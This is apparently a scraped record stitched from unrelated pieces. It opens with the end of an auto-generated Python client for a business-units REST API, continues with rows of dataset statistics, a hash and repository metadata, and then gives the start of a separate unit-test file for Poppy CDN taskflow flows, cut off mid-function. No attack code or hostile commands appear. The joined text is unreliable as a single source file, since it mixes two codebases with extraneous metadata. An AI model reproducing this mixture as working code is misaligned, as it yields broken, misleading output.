def get_business_unit_with_http_info(self, business_unit_id, **kwargs): # noqa: E501
"""Get business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_business_unit_with_http_info(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['business_unit_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_business_unit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'business_unit_id' is set
if ('business_unit_id' not in params or
params['business_unit_id'] is None):
raise ValueError("Missing the required parameter `business_unit_id` when calling `get_business_unit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'business_unit_id' in params:
path_params['businessUnitId'] = params['business_unit_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/businessUnits/{businessUnitId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BusinessUnitDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_business_units(self, **kwargs): # noqa: E501
"""List business units # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_business_units(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the business unit
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoBusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_business_units_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_business_units_with_http_info(**kwargs) # noqa: E501
return data
def list_business_units_with_http_info(self, **kwargs): # noqa: E501
"""List business units # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_business_units_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the business unit
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoBusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_business_units" % key
)
params[key] = val
del params['kwargs']
if 'page_number' in params and params['page_number'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_number` when calling `list_business_units`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] > 50: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `list_business_units`, must be a value less than or equal to `50`") # noqa: E501
if 'page_size' in params and params['page_size'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `list_business_units`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'page_number' in params:
query_params.append(('pageNumber', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/businessUnits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDtoBusinessUnitDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_business_unit(self, business_unit_id, **kwargs): # noqa: E501
"""Edit business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_business_unit(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:param BusinessUnitEditDto body:
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
else:
(data) = self.update_business_unit_with_http_info(business_unit_id, **kwargs) # noqa: E501
return data
def update_business_unit_with_http_info(self, business_unit_id, **kwargs): # noqa: E501
"""Edit business unit # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_business_unit_with_http_info(business_unit_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int business_unit_id: (required)
:param BusinessUnitEditDto body:
:return: BusinessUnitDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['business_unit_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_business_unit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'business_unit_id' is set
if ('business_unit_id' not in params or
params['business_unit_id'] is None):
raise ValueError("Missing the required parameter `business_unit_id` when calling `update_business_unit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'business_unit_id' in params:
path_params['businessUnitId'] = params['business_unit_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/businessUnits/{businessUnitId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BusinessUnitDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.09542
| 421
| 0.616177
| 2,377
| 20,486
| 5.040387
| 0.087085
| 0.086136
| 0.052583
| 0.030048
| 0.916952
| 0.906853
| 0.896586
| 0.883566
| 0.883566
| 0.869293
| 0
| 0.019589
| 0.294787
| 20,486
| 523
| 422
| 39.170172
| 0.809718
| 0.322171
| 0
| 0.768953
| 0
| 0.01083
| 0.207544
| 0.048756
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039711
| false
| 0
| 0.01444
| 0
| 0.111913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
469b233ab630f32a917a0e8a280b0be19f38c534
| 54,703
|
py
|
Python
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 3
|
2017-07-05T20:09:59.000Z
|
2018-11-27T22:02:57.000Z
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 24
|
2017-04-18T15:14:04.000Z
|
2019-03-20T19:09:07.000Z
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 8
|
2017-04-03T13:24:27.000Z
|
2021-11-08T20:28:10.000Z
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import uuid
import mock
from mock import ANY
from oslo_context import context as context_utils
from taskflow import engines
from poppy.distributed_task.taskflow.flow import create_service
from poppy.distributed_task.taskflow.flow import create_ssl_certificate
from poppy.distributed_task.taskflow.flow import delete_service
from poppy.distributed_task.taskflow.flow import delete_ssl_certificate
from poppy.distributed_task.taskflow.flow import purge_service
from poppy.distributed_task.taskflow.flow import recreate_ssl_certificate
from poppy.distributed_task.taskflow.flow import update_service
from poppy.distributed_task.taskflow.flow import update_service_state
from poppy.distributed_task.taskflow.task import common
from poppy.distributed_task.utils import memoized_controllers
from poppy.model.helpers import domain
from poppy.model.helpers import origin
from poppy.model import service
from poppy.model import ssl_certificate
from tests.unit import base
from tests.unit.manager.default.test_services import MonkeyPatchControllers
class DNSException(Exception):
pass
class TestFlowRuns(base.TestCase):
def setUp(self):
super(TestFlowRuns, self).setUp()
pyrax_cloud_dns_patcher = mock.patch('pyrax.cloud_dns')
pyrax_cloud_dns_patcher.start()
self.addCleanup(pyrax_cloud_dns_patcher.stop)
pyrax_set_credentials_patcher = mock.patch('pyrax.set_credentials')
pyrax_set_credentials_patcher.start()
self.addCleanup(pyrax_set_credentials_patcher.stop)
cassandra_cluster_patcher = mock.patch('cassandra.cluster.Cluster')
cassandra_cluster_patcher.start()
self.addCleanup(cassandra_cluster_patcher.stop)
self.time_factor = 0.001
self.total_retries = 5
self.dns_exception_responder = [
{
'cdn_provider':
{
'error': 'DNSException',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
]
self.dns_responder = [
{
'cdn_provider':
{
'success': 'True',
}
}
]
@staticmethod
def all_controllers():
service_controller, storage_controller = \
memoized_controllers.task_controllers('poppy', 'storage')
service_controller, dns_controller = \
memoized_controllers.task_controllers('poppy', 'dns')
service_controller, ssl_cert_controller = \
memoized_controllers.task_controllers('poppy', 'ssl_certificate')
return service_controller, storage_controller, dns_controller, \
ssl_cert_controller
def dns_exceptions_and_succeed(self):
# NOTE(TheSriram): create a chain of mocked return values,
# to allow for retries, and finally succeed. The last value
# indicating success, is just shown to indicate
# that exceptions were not thrown.
dns_responder_returns = [self.dns_exception_responder * 3]
dns_responder_returns.append(self.dns_responder)
return dns_responder_returns
def dns_exceptions_only(self):
# NOTE(TheSriram): create a chain of mocked return values,
# to allow for retries, and finally fail.
dns_responder_returns = [self.dns_exception_responder * 5]
return dns_responder_returns
@staticmethod
def patch_create_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.get_service.return_value = mock.Mock(domains=[])
storage_controller.update_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create = mock.Mock()
service_controller.provider_wrapper.create._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_update_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.update = mock.Mock()
service_controller.provider_wrapper.update._mock_return_value = []
service_controller.distributed_task_controller.submit_task = mock.Mock()
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller.delete_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete = mock.Mock()
service_controller.provider_wrapper.delete._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = []
@staticmethod
def patch_purge_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller.delete_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.purge = mock.Mock()
service_controller.provider_wrapper.purge._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
@staticmethod
def patch_service_state_flow(service_controller,
storage_controller, dns_controller):
storage_controller.update_state = mock.Mock()
dns_controller.enable = mock.Mock()
dns_controller.enable._mock_return_value = []
dns_controller.disable = mock.Mock()
dns_controller.disable._mock_return_value = []
@staticmethod
def patch_create_ssl_certificate_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create_certificate = mock.Mock()
service_controller.provider_wrapper.create_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_ssl_certificate_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
ssl_cert_controller.storage.delete_certificate = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete_certificate = mock.Mock()
service_controller.provider_wrapper.delete_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_ssl_certificate_retry_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
ssl_cert_controller.storage.delete_certificate = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete_certificate = mock.Mock()
service_controller.provider_wrapper.delete_certificate. \
_mock_return_value = {
"cdn_provider": {
'error': "",
'error_detail': ""
}
}
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_recreate_ssl_certificate_flow(
service_controller, storage_controller, dns_controller):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create_certificate = mock.Mock()
service_controller.provider_wrapper.create_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
def test_create_flow_normal(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller,
storage_controller,
dns_controller)
engines.run(create_service.create_service(), store=kwargs)
def test_update_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
engines.run(update_service.update_service(), store=kwargs)
def test_delete_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
storage_controller.get_service = mock.Mock(
return_value=service_obj)
engines.run(delete_service.delete_service(), store=kwargs)
def test_purge_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'purge_url': 'cdn.poppy.org',
'hard': json.dumps(True),
'service_obj': json.dumps(service_obj.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_purge_flow(service_controller, storage_controller,
dns_controller)
engines.run(purge_service.purge_service(), store=kwargs)
def test_service_state_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_create_flow_dns_exception(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(create_service.create_service(), store=kwargs)
def test_update_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(update_service.update_service(), store=kwargs)
def test_delete_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
service_mock = mock.Mock()
type(service_mock).domains = []
storage_controller.get_service.return_value = service_mock
dns_controller.delete = mock.Mock()
dns_controller.delete._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(delete_service.delete_service(), store=kwargs)
def test_service_state_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_controller.enable = mock.Mock()
dns_controller.enable._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
dns_controller.disable = mock.Mock()
dns_controller.disable._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_update_flow_dns_exception_with_retry_and_succeed(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.update._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service.update_service(), store=kwargs)
def test_update_flow_dns_exception_with_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.update._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service.update_service(), store=kwargs)
def test_create_flow_dns_exception_with_retry_and_succeed(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.create._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(create_service.create_service(), store=kwargs)
def test_create_flow_dns_exception_with_retry_and_fail(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.create._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(create_service.create_service(), store=kwargs)
def test_delete_flow_dns_exception_with_retry_and_succeed(self):
